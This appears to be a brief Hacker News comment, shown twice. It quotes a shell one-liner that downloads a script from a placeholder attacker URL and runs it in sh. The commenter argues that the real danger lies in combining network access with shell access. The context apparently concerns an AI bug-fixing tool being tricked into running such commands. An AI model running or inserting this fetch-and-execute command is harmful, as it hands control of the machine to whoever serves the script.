Comment by 1718627440
3 hours ago
> cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.
3 hours ago
> cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.
No comments yet
Contribute on Hacker News ↗